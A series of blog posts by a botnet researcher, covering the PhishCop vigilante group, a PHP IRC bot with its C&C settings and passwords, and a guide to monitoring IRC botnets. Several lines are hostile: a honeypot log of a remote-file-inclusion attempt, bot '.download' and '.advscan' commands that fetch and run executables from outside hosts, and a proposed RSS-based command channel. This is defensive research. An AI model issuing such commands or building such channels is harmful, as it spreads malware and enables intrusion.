Someone claiming to be from PhishCop responded to my blog entry about them. The comment they left solidifies my concerns about their operations. The comment and my follow up post are available here.

I am most concerned about the comment at the bottom:

I don't know what you have against Phishcop (also a completely volunteer organization) except that we seem to be effective at what we do, even if it means crossing the line a little?

My opinion about that statement is - they are admitting to, and taking ownership of several compromised webservers. Furthermore, by damaging the forensic timeline, they could be looking a legal battle to prove the server was compromised before they took control.

I have decided to track this group as I would any botnet. I will use my passive tools, google searches, and phishing related emails to compile a case for law enforcement. Unlike the claims PhishCops makes, my tracking tools will NOT compromise any servers or clients. I invite you to assist by reporting all Phishcop related compromises to myself or to an agency listed at http://www.usdoj.gov/criminal/cybercrime/reporting.htm.

Google currently shows that servers on the domains fm101.fm and server.gulflook.com have been re-compormised by PhishCop. fm101.fm will be reported to my contacts in Taiwan. The other appears to be down at the moment.

A note: I know that anyone can impersonate anyone else on the internet. These compromises may not be the work of phishcop, they could be a jab against a perfectly legitimate group of individuals. I have emailed Mr. Klos for comment.

UPDATE: Thanks for the additional domains and IPs: pysy.jurnalist.biz, www.chicagowebprogrammers.com, 64.57.224.4, 12.191.45.25, networkcritical.net, and www.ifjak.org. Keep 'em coming!

Labels: Botnet monitoring, fake malware, hack-backs, Mailbag, phishcop, phishing, trickery

I received a message today with a link to hxxp://201[.]3[.]192[.]61/~compras/postcard[.]jpg[.]exe.

Postcard.jpg.exe has been identified as Hoax.Phiscop.A by various anti-virus vendors, and contains the following hashes:

MD5: 7f283acb3ce6a004697c2ada3c0da539
SHA1: c8cd13b4232942ef64114e90795f8d6f7ca82aeb

Once launched, the binary performs a DNS lookup for www.phishcop.net, and attempts to get star.gif from the website.


The application then pops up an alert window insulting the user:

Or for those who prefer, the screenshot of the actual window:



I've always been a big fan of user education - however I beleive this is taking it too far. Whois reports show that the domain was registered in 2005, and it does not appear there is anything malicious with the domain or the binary. Still, this is an irresponsible way to educate users not to click links in email.

Furthermore, visiting http://201[.]3[.]192[.]61/~compras/ shows the following page:


Looking back through the Phishcop site, I noticed: Total unique IP addresses that have visited a fixed phishing site: 70465.

This suggests to me that the individual(s) behind www.phishcop.com have placed files on the remote server. A remote server that they may not control. By doing so, they have damaged forensic data, accessed and modified data that did not belong to them, and depending on the phish, could have stolen private data. After several years working as a incident investigator and even more working in the botnet scene, I find it hard to believe the owner of the site would authorize "phishcop" make these modifications on their behalf.

Looking through my webspider history, it looks like Phishcop has been very active over the last few months. Dozens of phishing sites have redirects to Phishcop.

In the event you come across a phish or malware hosted site -- please be careful what you do with the information. You have no rights to hack a server that does not belong to you - even if it is spewing illegal or malicious data. In fact, you may damage any chance of investigation by doing so. Report phishing, malware, and other such activities to your governments CERT team, law enforcement, the victims hosting provider or well known anti-malware/phishing teams like Shadowserver. These individuals are more likely to be trained in proper incident handling and forensic gathering procedures. Additionally, this gives the victim the best chance to fix the code that allowed the attacker in.

Please report any PhishCop modified websites as well. If you feel uncomfortable speaking with the above mentioned groups - you may report them to me. I will contact the proper authorities and victims for you.

UPDATE:

Threat Expert has something up on this as well: http://www.threatexpert.com/report.aspx?md5=7f283acb3ce6a004697c2ada3c0da539

This Google Search shows other sites with "PhishCop" pages:
http://www.google.com/search?q=%22This+has+been+a+public+service+of+http://www.phishcop.net%22+-site:www.phishcop.net&hl=en&filter=0

Note the ftp.klos.com hit is actually the guy who owns Phishcop. The FTP server also has some PHP shells/backdoors that could be used to further compromise a server.

If your site contains any of the following files, it may indicate that PhishCop was there:

7f283acb3ce6a004697c2ada3c0da539 bozo.exe
5277986a08f49d19b97ab501479b73ac CAUTION.jpg
87e023db582e9fa341f1620d77e72895 fix
5f56f34fba5556a6ca8eb7090a494c42 scamfiles.zip
80e62bbd9942b9db626833a3c50abe3b scam.html
80e62bbd9942b9db626833a3c50abe3b scam.html.txt
a9a49a861cf1408fdc8c6da2c9f6a58b scam.php
c539a96344c50d65107ce7cd563a7166 scam.php.txt
1a003f76318f6d3e3d2ae110ff7901cc tools2.php
509ef4118b930fe08e92f5136caeed6d tools.php

Labels: Botnet monitoring, fake malware, hack-backs, Mailbag, phishcop, phishing, trickery

While going through a couple dozen newer RFI's, I found a suspect file that turned out to be more than the usual RFI.
I thought some of my readers would like more information on this one. The file was called pbot.txt, and was downloaded from a server in Taiwan.

This file turns out to be a decently coded PHP Bot which connects to an IRC C&C. The IRC Server is located at irc.indoirc.net - which hosts a handful of smaller botnets, but also appears to be somewhat legitimate.

The bot joins a C&C channel, in this case #AnakDompu, and waits for commands. This version of the bot allows for UDP and TCP flooding, and a connect back shell. The shell is written in perl and is commonly found in many perl bots and newbie hacker kits. Google searches for dc.pl will turn up many examples.

The bot contains the dc.pl perl script in base64 encoded text. Since webservers commonly run in datacenters with a good deal of bandwidth, the TCP and UDP flooding capabilities are more generally more successful than the those on a home machine with limited upload speed.

I couple thousand of these bots could easily compare to 30 or 40 thousand dsl/cable user bots. Lucky for us, there are only 36 bots connected at this time.

I'm sure the bot author is still wondering why his commands aren't working on my snoopbot. He hasn't kicked/banned the fake bot, and continues to issue commands that just don't work.

Normally I have to work to strip out the C&C information out of the bots. These guys made it easier on me...

"server"=>"irc.indoirc.net",
"port"=>"6667",
"pass"=>"Walau.Jelek.Tetap.Bilang.Cakep.La",
"prefix"=>"ManieZ",
"maxrand"=>8,
"chan"=>"#AnakDompu",
"chan2"=>"#AnakDompu",
"key"=>"",
"modes"=>"+iBx",
"password"=>"AnakDompu",
"trigger"=>"~",
"hostauth"=>"Orang.Cakep.Tetap.Bilang.C-a-K-e-P.Co.Cc" // * for any hostname

Most of the standard IRC IDS Signatures will work in this case.

Note: Monitoring bots should always be done with the consent of your ISP. I have permission from my ISP's to perform these monitoring activities and to run Honeypots. As they say, don't try this at home.

For those who know what their doing, and are authorized by their ISP's to do so, my honeypot log entry is provided below.

89.218.85.18 - - [01/Jan/2009:14:18:37 -0500] "GET --VULNERABILITY REDACTED--=http:// c-a-k-e-p.co.cc /adu /pbots.txt??? HTTP/1.1" 200 2324 - "-" "libwww-perl/5.805" "-"

Note, the 200 status code is a feature of my honeypot - it returns 200 for all pages, found or not. I added the spaces above to keep from accidental clicks.
I removed the vulnerable page information, because I don't think its helpful to give that level of detail.

--- Another IRC bot:

A postcard? -- Nah.. A MIRC bot.

This little jewel comes from our mailbag. It was included as a binary, no source host for infection.

The file, postcard.exe is actually a RAR compressed SFX archive. When run, a RAR script that calls
a batch file is launched. The batch file opens a mountain scene picture entitled xmas.jpg.

It also runs a copy of MIRC and places that same binary in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
It uses a likely stolen/generated MIRC license ending with 6732.

It installs itself in C:\Windows\temp\spoolsv\spoolsv.exe - which would be okay, except for that directory
isn't writable on my system as a normal user. That and the location of the run key means it will only infect
those who run with administrator rights.

MIRC Bots are scripted by those not experienced. Those that connect to public IRC servers like UnderNET prove
the authors inexperience.

This one joins the channel #romania on Undernet. I'm sure the IRCOps will be on it before too long, if they
actually have any hosts - I didn't bother to check.

Labels: Botnet monitoring, Botnets, C and C, Honeypots, PHPBot, RFI

Over the past four years we've seen a large number of law enforcement, ISPs, and hobbyists get involved with botnet monitoring. A side effect of the increased interest is that botnet operators will go to great lengths to keep their botnets hidden. That includes encryption, hiding in plain sight, use of undocumented/new protocols and distributed control structures. As law enforcement arrests more offenders, we see more of them using TOR, or their own botnets to hide their true identity. While I personally don't feel it will ever be the super-bug theory that Paul Vixie and Gadi Evron imagine, it is a concern we need to be aware of.

The following post may help drive some botnet operators deeper underground, but the concepts are not new. In many cases these concepts are in use today. I presented on these topics a year ago at the 5th Botnet Task Force conference. For a year security researchers and law enforcement have had the chance to reflect on my presentation and develop mitigation.

Distributed Command and Control is simply a term we use to identify botnets where the operator has learned that directly controlling a large botnet is a big risk to himself and his network. Large scale botnets still exist today, however the operators are wisely breaking these networks up into many smaller networks - or using peer to peer communication. Since the networks are spread out, its harder to eliminate the threat of one attacker.

For example, if a botnet operator takes his 50,000 bots, and spreads them out into 10 networks, each net could have 5,000 drones. By spreading his network out, he mitigates some of the threat from rival operators, botnet hunters, ISPs, and law enforcement. Even if one controller node was taken offline, the botnet operator has 45,000 bots to retaliate with. In many circumstances this gives an operator the heads up he needs to update his 45,000 other bots and protect his empire.

As recent as two years ago, we've started seeing botnets using a pyramid structure, like the simplified image below.



A botnet operator is represented at the top of this flow chart. He communicates with a smaller botnet of only a couple dozen drones. Those drones then communicate with many larger botnets, who perform the stated action. This provides the botnet operator a layer of protection. Now the experienced researchers or law enforcement must find the smaller net, to identify the botnet operator. This is time consuming work, and with out the cooperation of ISP's, its hard work. Even if a controller node is found, it is much easier to snoop on a net with 5,000-10,000 drones than it is one with less than 100 drones.

This distributed structure also helps if the botnet operator wants to rent out or sale portions of his bot. One chunk can be used for spam, while another may perform better in Denial of service type activities.

Another example of distributed structure is the P2P scenario, where the botnet operator issues a command, which is passed to a number of supernodes, whom then pass it to the single peers.

Mapping peer to peer and other types of DC&C's are still possible. It was done with Stormworm and will continue to be done with future P2P botnets. I wont highlight how researchers are doing this mapping, simply because we need to weigh teaching public (including bad-guys) and keeping an ace up our sleeves. I'm hoping this post will spark many closed door conversations to help investigate other methods for tracking and identifying.

As part of the BTF presentation I gave, I wanted to outline additional C&C vectors that could be used. The idea that really caught my eye was based on hiding in plain site. Using protocols that are commonly used by millions of users every day. CME711 (Stormworm) has been easy to keep on top of, because of the mistakes they make in maintaining their DNS (fast flux), registering their domains and using UDP P2P traffic. Because of that UDP P2P traffic many large corporations have been immune - they disable UDP outbound.

The number of infected machines would increase dramatically if the used a connection model similar to Skype.

So back to hiding in plain sight - What would you say to a bot that received its commands over RSS? News readers use RSS to gather headlines and a few lines of news. Users are able to quickly choose articles that interest them, while ignoring those that do not. Millions of people subscribe to RSS feeds, and many of those feeds are of blogger or comment pages. Many news sites allow comments on their website, which can then be retrieved via RSS. Since RSS is simply http requests wrapped in a pretty new interface (XML) bots could easily parse this data to receive commands. An anonymous poster could post a command, and bots could be scheduled to pull the feed every 10-15 minutes. The request would look like legitimate RSS traffic and it would be hard to tell which visitors were bots and which were legitimate.

Using a form of encryption the botnet operator could even protect his botnet so others were unable to issue commands. High profile news and blogging sites might not be so helpful with requests to disable portions of their website because a botnet used it as a command and control vector. They might be more willing to assist law enforcement though, certainly more willing than some ISP's.

So how do users protect themselves, and the rest of the internet community?

First, users should use common sense. Don't click links in email or instant messenger! If the email contains a link, use the cut and paste function to visit URLs. If you're offered a picture or video in instant messenger, verify the sender sent the file and only then use your best judgment before proceeding.

Don't download untrusted software. Even if its recommended by your neighborhood computer genius (highschool student) - do research with an internet search engine. What do others say about it?

Don't surf as an administrator. Even if you do pick up a piece of malware, if you're logged in with limited privileges you will be less likely to install harmful malware.

Online banking should be done from a secure location. Do not access your bank account from hotspots like coffee shops or restaurants. Avoid doing so from work as well - remember in the United States you have no right to privacy on your corporate PC, which likely means your boss is watching where you surf. He or she might just be using a keystroke logger.

Never give your personal information on the internet. Your bank will not notify you of account problems via email - and in the event that changes over the next few years, bank pages are usually encrypted. Watch for "https://" at the beginning of your URL bar. Watch for the padlock icon on most browsers. If you're presented with an expired or self signed certificate, cancel the connection and notify the webmaster immediately.

Consider using a Sandboxer for programs that access the internet. SandboxIE is a great piece of software that will wrap around web browsers, email clients, instant messengers, just about any application that accesses the internet. It uses temporary user space to protect you from hostile code.

Don't consider "known" sites trusted. No site is ever trusted. Sites are compromised every day. Many times these compromises point to code that will attempt to compromise your PC.

If possible, disable Javascript for sites you casually visit. Using the NoScript Firefox plugin is an excellent idea for most users. This is becoming increasingly harder as poor coders are hired to develop websites.

Use firewalls at both the router and operating system level.

Turn your pc off when not in use. Even if your machine is infected, the damage it can do would be limited to the time you spend on your system. Most users are on their home computer for only a few hours a day.

Keep your Antivirus definitions and application patches up to date. Remember many third party applications will not update every month like your operating system. You should do this manually or work with the vendor to schedule updates.

Alternative operating systems are no excuse for poor security practices. Linux has malware, OSx has malware, BSD has malware. Keep your security hat on even if you don't run the targeted OS of the month.

Report suspected botnet activity and spam. CastleCops and Shadowserver have excellent resources available to help report malicious activity. DISOG staff always welcomes submissions via email (staff [-at-] disog.org).

Labels: Botnet monitoring, Botnet Task Force, CME711, DC and C, javascript, p2p botnet, SandboxIE, Skype, Stormworm, Superbug, supernodes

This post is mainly for people interested in researching botnets. Many people treat botnet monitoring as a hobby. In many ways, its almost as fun as people watching.

Section 1, the rules of behavior:

You will likely see information you should not normally be privy to. For example, keylogged data, passwords, IP's of vulnerable systems, instant messenger conversations, etc. You must not repeat any private information you see. You must not use any private information you see. You may report leaks of private information to the victim (if known) or law enforcement. Do not report such information to botnet monitoring groups, mailing lists or blogs. Remember, you too could be the victim some day. Treat the data you see with respect.

You may at some point get admin rights on the botnet - Occasional hiccups happen. You must not issue any commands to disrupt the botnet or remove the drones. Issuing commands places you in the same category as the attacker, and in many countries you can be charged criminally if caught. There have been extreme cases where botnet authors replace the remove function with hostile code that causes more damage to the victim PC.

You may contact ISP's, domain registrars, and victims in attempts to get the botnet taken offline. You will likely receive the hairy eyeball - be prepared to back up your accusations/statements with hard facts.

In some countries monitoring botnets is illegal, in others there has not yet been a ruling. Check your local laws before monitoring! Understand you accept all risks. If your not comfortable with this, don't read any further.

You will likely get attacked or threatened. As you learn how the botnets work, you will likely tip your hand. Everyone does. Since botnet hunting has become such an interesting hobby, there are hundreds of other people making these mistakes too. For that reason, the botnet operators (aka herders) have a keen eye and can identify snoopers quickly. In most cases you will simply be denied access to the botnet, by IP banning. In others you will be threatened by the botnet operator, or hit with denial of service attacks. This generally upsets your internet service provider, and you could risk losing internet access.

Never, ever, use proxys to snoop on botnets. If your too chicken to do it from IP addresses you have legitimately rented, then don't track botnets. Using proxy's means you're placing someone else at risk for denial of service attacks, and repeated attacks could mean they lose internet access. While there is a certain risk proxy operators take, your sloppy botnet monitoring skills should not be one of them. Dialup accounts are cheap, between 5 and 10 dollars a month in the US. Use one if you're worried about staying anonymous. Additionally you don't know who may be intercepting proxy traffic. A proxy operator may not be as honest as you, and may use captured botnet traffic maliciously.

Section 2, Locating binaries:

For this section I turned to my old Standby, SearchIRC. Using the keywords ".download http:// .exe" I was able to find:

.download http://www[dot]kartalkusculari[dot]com/oky.exe C:/oky.exe 1
Connects to:
Server: irc.webmaster.com
Port: 6667
Channel: #pert
Channel Topic: .advscan asn2 200 5 0 -r -b
Also downloads http://www[dot]freewebtown[dot]com/hidex/test.exe

.http.exe http://www[dot]freewebtown[dot]com/ssexs/mode.exe C:mode.exe 1
Connects to:
Server: irc.webchat.org
Port: 6667
Channel: #Scanall`

.scarikiamo http://www[dot]freewebtown[dot]com/n0mad/abdo.exe c:/abdo.exe 1
Connects to:
Server: f0ryou.no-ip.info
Port: 6667
Channel: ##!scanall, ##!scanallexp

Other malicious files can be found by looking through the archives at MalwareDomainList and OffensiveComputing.

Section 3, extracting information:

Malware disassembly is an art, and something that can't be explained in a paragraph or two. However there are a few online sandboxes that will assist you as you get started botnet hunting. Anubis and CWSandbox are great. If you have time and resources to spare, investigate creating your own Truman sandnet. Once you've decided to manually reverse engineer malware, I suggest looking around OpenRCE, and attending an Assembler class at a local college.

Other useful tools for new hunters include: Process Explorer, Malcode Analysis Pack, IdaPro, OllyDbg, Cygwin, Perl and Python.

Section 4, putting it all together:

Once you've downloaded a binary, upload it to one of the free sandbox tools listed above. These tools will give pretty detailed information. If your binaries Command and Control (C&C) method is IRC, fire up Infiltrator. Using the sandbox details you should be able to set your username, nickname, and software version to mimic the bot. Connect to the botnet and log the traffic (if permitted by local Laws).

Keep a journal of what you see, learn how the bot interacts with the operator. Learn the commands commonly used, and watch for additional malware as the bots are updated or moved. Note any click-fraud or denial of service attacks.

Section 5, moving on:

Computer security doesn't start or stop with botnets and malware. There are so many more things to explore and learn. Attend conferences, join local user groups and mailing lists, obtain SANS certifications. You never know what the next big thing will be. Stay cutting edge and you will enjoy everything computer security has to offer.

Labels: Anubis Sandbox, Botnet monitoring, Computer Security, Infiltrator, malware research, TOR

Usually the first question asked by someone who is interested in botnet monitoring is, "What do you use to monitor botnets?"

New hunters tend to watch IRC networks, then move up to HTTP, P2P, etc. Many new hunters try to use off the shelf IRC clients, until they realize the bloat really isn't worth it, and monitoring more than a dozen nets is incredibly impossible. Furthermore, monitoring custom IRCd's with an RFC compliant client will likely raise the suspicions of the botherder.

A friend (Magictao) found a newer client called Infiltrator and passed it my direction. Infiltrator is a python script written by zeroq. It should run on both Windows and *nix, and will allow you to monitor several botnets at once with very little bloat. We use something similar here at DISOG.

Paul has not had a chance to review the code yet and my python is very weak but I could not see anything too dangerous. Just remember this client will download urls seen in the IRC traffic. Please do what you can to protect yourself from accidental discharge of any downloaded malware. I ran the client for an hour or so this evening, and it did everything as advertised. Its missing documentation, but if you have a few minutes - give it a shot!

Labels: Botnet monitoring, Infiltrator, Python